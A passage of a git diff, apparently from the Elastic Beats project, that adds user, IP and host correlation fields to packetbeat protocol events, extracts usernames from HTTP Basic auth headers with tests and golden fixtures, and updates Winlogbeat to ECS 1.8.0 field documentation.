qiOtRXzO59kjIx1KNyyy/8zs1z+jG8nbjoOfdULWsDcJf5XU6gebbKfSiA3PqUJPh/AQAA//9VaEu9" } diff --git a/packetbeat/protos/amqp/amqp.go b/packetbeat/protos/amqp/amqp.go index 1113d4ee6dfb..f0c1e26dd28a 100644 --- a/packetbeat/protos/amqp/amqp.go +++ b/packetbeat/protos/amqp/amqp.go @@ -455,6 +455,10 @@ func (amqp *amqpPlugin) publishTransaction(t *amqpTransaction) { } fields["amqp"] = t.amqp + if userID, found := t.amqp["user-id"]; found { + fields["user.id"] = userID + } + //let's try to convert request/response to a readable format if amqp.sendRequest { if t.method == "basic.publish" { diff --git a/packetbeat/protos/cassandra/pub.go b/packetbeat/protos/cassandra/pub.go index c4d0164310e4..3b90c53feae7 100644 --- a/packetbeat/protos/cassandra/pub.go +++ b/packetbeat/protos/cassandra/pub.go @@ -69,7 +69,9 @@ func (pub *transPub) createEvent(requ, resp *message) beat.Event { evt, pbf := pb.NewBeatEvent(ts) pbf.SetSource(&src) + pbf.AddIP(src.IP) pbf.SetDestination(&dst) + pbf.AddIP(dst.IP) pbf.Event.Dataset = "cassandra" pbf.Network.Transport = "tcp" pbf.Network.Protocol = pbf.Event.Dataset diff --git a/packetbeat/protos/http/event.go b/packetbeat/protos/http/event.go index 691f8b1d1560..f53ed9b632d2 100644 --- a/packetbeat/protos/http/event.go +++ b/packetbeat/protos/http/event.go @@ -42,6 +42,9 @@ type ProtocolFields struct { // Referrer for this HTTP request. RequestReferrer common.NetString `ecs:"request.referrer"` + // HTTP request mime-type. + RequestMIMEType string `ecs:"request.mime_type"` + // Http response status code. ResponseStatusCode int64 `ecs:"response.status_code"` @@ -69,6 +72,9 @@ type ProtocolFields struct { // HTTP response headers. ResponseHeaders common.MapStr `packetbeat:"response.headers"` + // HTTP response mime-type. + ResponseMIMEType string `ecs:"response.mime_type"` + // HTTP response status phrase. ResponseStatusPhrase common.NetString `packetbeat:"response.status_phrase"` } diff --git a/packetbeat/protos/http/http.go b/packetbeat/protos/http/http.go index 3dd7484822ef..dd57ada3ce97 100644 --- a/packetbeat/protos/http/http.go +++ b/packetbeat/protos/http/http.go @@ -19,6 +19,7 @@ package http import ( "bytes" + "encoding/base64" "fmt" "net" "net/url" @@ -439,6 +440,11 @@ func (http *httpPlugin) handleHTTP( m.tcpTuple = *tcptuple m.direction = dir m.cmdlineTuple = http.watcher.FindProcessesTupleTCP(tcptuple.IPPort()) + + if !http.redactAuthorization { + m.username = extractBasicAuthUser(m.headers) + } + http.hideHeaders(m) if m.isRequest { @@ -533,6 +539,8 @@ func (http *httpPlugin) newTransaction(requ, resp *message) beat.Event { evt, pbf := pb.NewBeatEvent(ts) pbf.SetSource(src) pbf.SetDestination(dst) + pbf.AddIP(src.IP) + pbf.AddIP(dst.IP) pbf.Network.Transport = "tcp" pbf.Network.Protocol = "http" @@ -552,6 +560,9 @@ func (http *httpPlugin) newTransaction(requ, resp *message) beat.Event { host, port := extractHostHeader(string(requ.host)) if net.ParseIP(host) == nil { pbf.Destination.Domain = host + pbf.AddHost(host) + } else { + pbf.AddIP(host) } if port == 0 { port = int(pbf.Destination.Port) @@ -560,6 +571,7 @@ func (http *httpPlugin) newTransaction(requ, resp *message) beat.Event { } pbf.Event.Start = requ.ts pbf.Network.ForwardedIP = string(requ.realIP) + pbf.AddIP(string(requ.realIP)) pbf.Error.Message = requ.notes // http @@ -568,6 +580,7 @@ func (http *httpPlugin) newTransaction(requ, resp *message) beat.Event { httpFields.RequestBodyBytes = int64(requ.contentLength) httpFields.RequestMethod = bytes.ToLower(requ.method) httpFields.RequestReferrer = requ.referer + pbf.AddHost(string(requ.referer)) if requ.sendBody && len(requ.body) > 0 { httpFields.RequestBodyBytes = int64(len(requ.body)) httpFields.RequestBodyContent = common.NetString(requ.body) @@ -588,6 +601,11 @@ func (http *httpPlugin) newTransaction(requ, resp *message) beat.Event { } fields["method"] = httpFields.RequestMethod fields["query"] = fmt.Sprintf("%s %s", requ.method, path) + + if requ.username != "" { + fields["user.name"] = requ.username + pbf.AddUser(requ.username) + } } if resp != nil { @@ -913,3 +931,28 @@ func (ml *messageList) pop() *message { func (ml *messageList) last() *message { return ml.tail } + +func extractBasicAuthUser(headers map[string]common.NetString) string { + const prefix = "Basic " + + auth := string(headers["authorization"]) + if len(auth) < len(prefix) || !strings.EqualFold(auth[:len(prefix)], prefix) { + return "" + } + + c, err := base64.StdEncoding.DecodeString(auth[len(prefix):]) + if err != nil { + c, err = base64.RawStdEncoding.DecodeString(auth[len(prefix):]) + if err != nil { + return "" + } + } + + cs := string(c) + s := strings.IndexByte(cs, ':') + if s < 0 { + return "" + } + + return cs[:s] +} diff --git a/packetbeat/protos/http/http_parser.go b/packetbeat/protos/http/http_parser.go index 748ea9dc712b..be4343ea1207 100644 --- a/packetbeat/protos/http/http_parser.go +++ b/packetbeat/protos/http/http_parser.go @@ -62,6 +62,7 @@ type message struct { isChunked bool headers map[string]common.NetString size uint64 + username string rawHeaders []byte diff --git a/packetbeat/protos/http/http_test.go b/packetbeat/protos/http/http_test.go index 0fcf94a3f397..d6696e4b4008 100644 --- a/packetbeat/protos/http/http_test.go +++ b/packetbeat/protos/http/http_test.go @@ -921,6 +921,36 @@ func TestHttpParser_RedactAuthorization(t *testing.T) { assert.True(t, proxyObscured) } +func TestExtractBasicAuthUser(t *testing.T) { + logp.TestingSetup(logp.WithSelectors("http", "httpdetailed")) + + http := httpModForTests(nil) + http.parserConfig.sendHeaders = true + http.parserConfig.sendAllHeaders = true + + data := []byte("POST /services/ObjectControl?ID=client0 HTTP/1.1\r\n" + + "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.5472)\r\n" + + "Content-Type: text/xml; charset=utf-8\r\n" + + "SOAPAction: \"\"\r\n" + + "Authorization: Basic ZHVtbXk6NmQlc1AwOC1XemZ3Cg\r\n" + + "Proxy-Authorization: Basic cHJveHk6MWM3MGRjM2JhZDIwCg==\r\n" + + "Host: production.example.com\r\n" + + "Content-Length: 0\r\n" + + "Expect: 100-continue\r\n" + + "Accept-Encoding: gzip\r\n" + + "X-Forwarded-For: 10.216.89.132\r\n" + + "\r\n") + + st := &stream{data: data, message: new(message)} + + ok, _ := testParseStream(http, st, 0) + + username := extractBasicAuthUser(st.message.headers) + + assert.True(t, ok) + assert.Equal(t, "dummy", username) +} + func TestHttpParser_RedactAuthorization_raw(t *testing.T) { http := httpModForTests(nil) http.redactAuthorization = true diff --git a/packetbeat/protos/mongodb/mongodb.go b/packetbeat/protos/mongodb/mongodb.go index 28a9350840ee..b05ebce91508 100644 --- a/packetbeat/protos/mongodb/mongodb.go +++ b/packetbeat/protos/mongodb/mongodb.go @@ -382,7 +382,9 @@ func (mongodb *mongodbPlugin) publishTransaction(t *transaction) { evt, pbf := pb.NewBeatEvent(t.ts) pbf.SetSource(&t.src) + pbf.AddIP(t.src.IP) pbf.SetDestination(&t.dst) + pbf.AddIP(t.dst.IP) pbf.Source.Bytes = int64(t.bytesIn) pbf.Destination.Bytes = int64(t.bytesOut) pbf.Event.Dataset = "mongodb" diff --git a/packetbeat/protos/mysql/mysql.go b/packetbeat/protos/mysql/mysql.go index 506b6c30ca8e..1553bdf9901e 100644 --- a/packetbeat/protos/mysql/mysql.go +++ b/packetbeat/protos/mysql/mysql.go @@ -1159,7 +1159,9 @@ func (mysql *mysqlPlugin) publishTransaction(t *mysqlTransaction) { evt, pbf := pb.NewBeatEvent(t.ts) pbf.SetSource(&t.src) + pbf.AddIP(t.src.IP) pbf.SetDestination(&t.dst) + pbf.AddIP(t.dst.IP) pbf.Source.Bytes = int64(t.bytesIn) pbf.Destination.Bytes = int64(t.bytesOut) pbf.Event.Dataset = "mysql" diff --git a/packetbeat/protos/nfs/request_handler.go b/packetbeat/protos/nfs/request_handler.go index d46560477432..fea417f4dc13 100644 --- a/packetbeat/protos/nfs/request_handler.go +++ b/packetbeat/protos/nfs/request_handler.go @@ -79,7 +79,9 @@ func (r *rpc) handleCall(xid string, xdr *xdr, ts time.Time, tcptuple *common.TC evt, pbf := pb.NewBeatEvent(ts) pbf.SetSource(&src) + pbf.AddIP(src.IP) pbf.SetDestination(&dst) + pbf.AddIP(dst.IP) pbf.Source.Bytes = int64(xdr.size()) pbf.Event.Dataset = "nfs" pbf.Event.Start = ts @@ -102,6 +104,8 @@ func (r *rpc) handleCall(xid string, xdr *xdr, ts time.Time, tcptuple *common.TC "xid": xid, } + fields := evt.Fields + authFlavor := xdr.getUInt() authOpaque := xdr.getDynamicOpaque() switch authFlavor { @@ -119,8 +123,14 @@ func (r *rpc) handleCall(xid string, xdr *xdr, ts time.Time, tcptuple *common.TC pbf.Source.Domain = machine } cred["machinename"] = machine + fields["host.hostname"] = machine + cred["uid"] = credXdr.getUInt() + fields["user.id"] = cred["uid"] + cred["gid"] = credXdr.getUInt() + fields["group.id"] = cred["gid"] + cred["gids"] = credXdr.getUIntVector() rpcInfo["cred"] = cred case 6: @@ -133,7 +143,6 @@ func (r *rpc) handleCall(xid string, xdr *xdr, ts time.Time, tcptuple *common.TC xdr.getUInt() xdr.getDynamicOpaque() - fields := evt.Fields fields["status"] = common.OK_STATUS // all packages are OK for now fields["type"] = pbf.Event.Dataset fields["rpc"] = rpcInfo diff --git a/packetbeat/protos/sip/plugin.go b/packetbeat/protos/sip/plugin.go index b9b1264f9677..bdd93d241170 100644 --- a/packetbeat/protos/sip/plugin.go +++ b/packetbeat/protos/sip/plugin.go @@ -178,7 +178,9 @@ func (p *plugin) buildEvent(m *message, pkt *protos.Packet) (*beat.Event, error) src, dst := m.getEndpoints() pbf.SetSource(src) + pbf.AddIP(src.IP) pbf.SetDestination(dst) + pbf.AddIP(dst.IP) p.populateEventFields(m, pbf, sipFields) diff --git a/packetbeat/tests/system/config/golden-tests.yml b/packetbeat/tests/system/config/golden-tests.yml index 42ad0c746d28..5adcf50b5cff 100644 --- a/packetbeat/tests/system/config/golden-tests.yml +++ b/packetbeat/tests/system/config/golden-tests.yml @@ -35,3 +35,8 @@ test_cases: - name: SIP Authenticated Register pcap: pcaps/sip_authenticated_register.pcap config: {} + + - name: HTTP Basic Auth + pcap: pcaps/http_basicauth.pcap + config: + http_send_all_headers: true diff --git a/packetbeat/tests/system/golden/established_tls-expected.json b/packetbeat/tests/system/golden/established_tls-expected.json index 3cfa141af3ae..ac0145028ab9 100644 --- a/packetbeat/tests/system/golden/established_tls-expected.json +++ b/packetbeat/tests/system/golden/established_tls-expected.json @@ -250,4 +250,4 @@ "tls.version_protocol": "tls", "type": "tls" } -] +] \ No newline at end of file diff --git a/packetbeat/tests/system/golden/http_basic_auth-expected.json b/packetbeat/tests/system/golden/http_basic_auth-expected.json new file mode 100644 index 000000000000..3943796d3412 --- /dev/null +++ b/packetbeat/tests/system/golden/http_basic_auth-expected.json @@ -0,0 +1,155 @@ +[ + { + "@metadata.beat": "packetbeat", + "@metadata.type": "_doc", + "client.bytes": 33, + "client.ip": "172.31.98.49", + "client.port": 51958, + "destination.bytes": 61, + "destination.ip": "8.8.8.8", + "destination.port": 53, + "dns.additionals_count": 0, + "dns.answers": [ + { + "class": "IN", + "data": "2606:2800:220:1:248:1893:25c8:1946", + "name": "www.example.com", + "ttl": "21353", + "type": "AAAA" + } + ], + "dns.answers_count": 1, + "dns.authorities_count": 0, + "dns.flags.authentic_data": false, + "dns.flags.authoritative": false, + "dns.flags.checking_disabled": false, + "dns.flags.recursion_available": true, + "dns.flags.recursion_desired": true, + "dns.flags.truncated_response": false, + "dns.header_flags": [ + "RD", + "RA" + ], + "dns.id": 42715, + "dns.op_code": "QUERY", + "dns.question.class": "IN", + "dns.question.etld_plus_one": "example.com", + "dns.question.name": "www.example.com", + "dns.question.registered_domain": "example.com", + "dns.question.subdomain": "www", + "dns.question.top_level_domain": "com", + "dns.question.type": "AAAA", + "dns.resolved_ip": [ + "2606:2800:220:1:248:1893:25c8:1946" + ], + "dns.response_code": "NOERROR", + "dns.type": "answer", + "event.category": [ + "network" + ], + "event.dataset": "dns", + "event.duration": 20690000, + "event.kind": "event", + "event.type": [ + "connection", + "protocol" + ], + "method": "QUERY", + "network.bytes": 94, + "network.community_id": "1:/Zwm1tJot2cAhFAO0OxKQHuXs3Y=", + "network.protocol": "dns", + "network.transport": "udp", + "network.type": "ipv4", + "query": "class IN, type AAAA, www.example.com", + "related.ip": [ + "172.31.98.49", + "8.8.8.8", + "2606:2800:220:1:248:1893:25c8:1946" + ], + "resource": "www.example.com", + "server.bytes": 61, + "server.ip": "8.8.8.8", + "server.port": 53, + "source.bytes": 33, + "source.ip": "172.31.98.49", + "source.port": 51958, + "status": "OK", + "type": "dns" + }, + { + "@metadata.beat": "packetbeat", + "@metadata.type": "_doc", + "client.bytes": 130, + "client.ip": "172.31.98.49", + "client.port": 55874, + "destination.bytes": 1591, + "destination.domain": "www.example.com", + "destination.ip": "93.184.216.34", + "destination.port": 80, + "event.category": [ + "network" + ], + "event.dataset": "http", + "event.duration": 18341000, + "event.kind": "event", + "event.type": [ + "connection", + "protocol" + ], + "http.request.bytes": 130, + "http.request.headers.accept": "*/*", + "http.request.headers.authorization": "Basic c2ltcGxlc2ltb246YWJjZDEyMys=", + "http.request.headers.content-length": 0, + "http.request.headers.host": "www.example.com", + "http.request.headers.user-agent": "curl/7.37.1", + "http.request.method": "get", + "http.response.body.bytes": 1270, + "http.response.bytes": 1591, + "http.response.headers.accept-ranges": "bytes", + "http.response.headers.cache-control": "max-age=604800", + "http.response.headers.content-length": 1270, + "http.response.headers.content-type": "text/html", + "http.response.headers.date": "Wed, 18 Feb 2015 00:13:06 GMT", + "http.response.headers.etag": "\"359670651\"", + "http.response.headers.expires": "Wed, 25 Feb 2015 00:13:06 GMT", + "http.response.headers.last-modified": "Fri, 09 Aug 2013 23:54:35 GMT", + "http.response.headers.server": "ECS (pae/3796)", + "http.response.headers.x-cache": "HIT", + "http.response.headers.x-ec-custom-error": "1", + "http.response.status_code": 200, + "http.response.status_phrase": "ok", + "http.version": "1.1", + "method": "get", + "network.bytes": 1721, + "network.community_id": "1:TMPM5eEnGOXfxAjx6NKlyjx+X10=", + "network.protocol": "http", + "network.transport": "tcp", + "network.type": "ipv4", + "query": "GET /", + "related.hosts": [ + "www.example.com" + ], + "related.ip": [ + "172.31.98.49", + "93.184.216.34" + ], + "related.user": [ + "simplesimon" + ], + "server.bytes": 1591, + "server.domain": "www.example.com", + "server.ip": "93.184.216.34", + "server.port": 80, + "source.bytes": 130, + "source.ip": "172.31.98.49", + "source.port": 55874, + "status": "OK", + "type": "http", + "url.domain": "www.example.com", + "url.full": "http://www.example.com/", + "url.path": "/", + "url.scheme": "http", + "user.name": "simplesimon", + "user_agent.original": "curl/7.37.1" + } +] \ No newline at end of file diff --git a/packetbeat/tests/system/golden/non_established_tls-expected.json b/packetbeat/tests/system/golden/non_established_tls-expected.json index 39641270769d..846c2d9d0817 100644 --- a/packetbeat/tests/system/golden/non_established_tls-expected.json +++ b/packetbeat/tests/system/golden/non_established_tls-expected.json @@ -112,4 +112,4 @@ "tls.version_protocol": "tls", "type": "tls" } -] +] \ No newline at end of file diff --git a/packetbeat/tests/system/golden/tls_1_3-expected.json b/packetbeat/tests/system/golden/tls_1_3-expected.json index 35fae5ab58ed..ba826d5408c9 100644 --- a/packetbeat/tests/system/golden/tls_1_3-expected.json +++ b/packetbeat/tests/system/golden/tls_1_3-expected.json @@ -122,4 +122,4 @@ "tls.version_protocol": "tls", "type": "tls" } -] +] \ No newline at end of file diff --git a/packetbeat/tests/system/golden/tls_all_options-expected.json b/packetbeat/tests/system/golden/tls_all_options-expected.json index 0106aa9048d7..b791c38aea33 100644 --- a/packetbeat/tests/system/golden/tls_all_options-expected.json +++ b/packetbeat/tests/system/golden/tls_all_options-expected.json @@ -257,4 +257,4 @@ "tls.version_protocol": "tls", "type": "tls" } -] +] \ No newline at end of file diff --git a/packetbeat/tests/system/golden/tls_no_certs-expected.json b/packetbeat/tests/system/golden/tls_no_certs-expected.json index 69af5c89b75d..d1907c51cbc0 100644 --- a/packetbeat/tests/system/golden/tls_no_certs-expected.json +++ b/packetbeat/tests/system/golden/tls_no_certs-expected.json @@ -146,4 +146,4 @@ "tls.version_protocol": "tls", "type": "tls" } -] +] \ No newline at end of file diff --git a/packetbeat/tests/system/golden/tls_not_detailed-expected.json b/packetbeat/tests/system/golden/tls_not_detailed-expected.json index 94283acb4bbb..7d521abda44b 100644 --- a/packetbeat/tests/system/golden/tls_not_detailed-expected.json +++ b/packetbeat/tests/system/golden/tls_not_detailed-expected.json @@ -90,4 +90,4 @@ "tls.version_protocol": "tls", "type": "tls" } -] +] \ No newline at end of file diff --git a/winlogbeat/cmd/root.go b/winlogbeat/cmd/root.go index e6d29e3a62ac..41259e7cab79 100644 --- a/winlogbeat/cmd/root.go +++ b/winlogbeat/cmd/root.go @@ -37,7 +37,7 @@ const ( Name = "winlogbeat" // ecsVersion specifies the version of ECS that Winlogbeat is implementing. - ecsVersion = "1.7.0" + ecsVersion = "1.8.0" ) // withECSVersion is a modifier that adds ecs.version to events. diff --git a/winlogbeat/docs/fields.asciidoc b/winlogbeat/docs/fields.asciidoc index 5df290e69e70..4628e29caad1 100644 --- a/winlogbeat/docs/fields.asciidoc +++ b/winlogbeat/docs/fields.asciidoc @@ -2044,7 +2044,7 @@ example: apache + -- Raw text message of entire event. Used to demonstrate log integrity. -This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. +This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, consider using the wildcard data type. type: keyword @@ -2097,7 +2097,7 @@ example: Terminated an unexpected process + -- Reference URL linking to additional information about this event. -This URL links to a static definition of the this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. +This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. type: keyword @@ -3288,6 +3288,19 @@ example: darwin -- +*`host.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`host.os.version`*:: + -- @@ -4362,6 +4375,19 @@ example: darwin -- +*`observer.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`observer.os.version`*:: + -- @@ -4532,6 +4558,19 @@ example: darwin -- +*`os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`os.version`*:: + -- @@ -7683,6 +7722,7 @@ URL fields provide support for complete or partial URLs, and supports the breaki -- Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. +If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. type: keyword @@ -7858,6 +7898,119 @@ The user fields describe information about the user that is relevant to the even Fields can have one entry or multiple entries. If a user has more than one id, provide an array that includes all of them. +*`user.changes.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.changes.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.changes.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.changes.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.changes.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.changes.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.changes.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.changes.name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.domain`*:: + -- @@ -7868,6 +8021,119 @@ type: keyword -- +*`user.effective.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.effective.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.effective.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.effective.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.effective.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.effective.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.effective.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.effective.name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.email`*:: + -- @@ -7971,6 +8237,119 @@ example: ["kibana_admin", "reporting_user"] -- +*`user.target.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.target.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.target.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.target.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.target.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.target.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.target.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.target.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.target.name.text`*:: ++ +-- +type: text + +-- + +*`user.target.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + [float] === user_agent @@ -8087,6 +8466,19 @@ example: darwin -- +*`user_agent.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`user_agent.os.version`*:: + -- diff --git a/winlogbeat/include/fields.go b/winlogbeat/include/fields.go index 37f77acf315b..ee7ef95c22b7 100644 --- a/winlogbeat/include/fields.go +++ b/winlogbeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetBuildFieldsFieldsCommonYml returns asset data. // This is the base64 encoded gzipped contents of build/fields/fields.common.yml. func AssetBuildFieldsFieldsCommonYml() string { - return "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